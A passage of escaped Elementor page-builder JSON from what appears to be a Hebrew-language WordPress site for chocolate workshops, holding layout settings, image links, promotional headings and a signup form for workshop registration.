settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\",\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp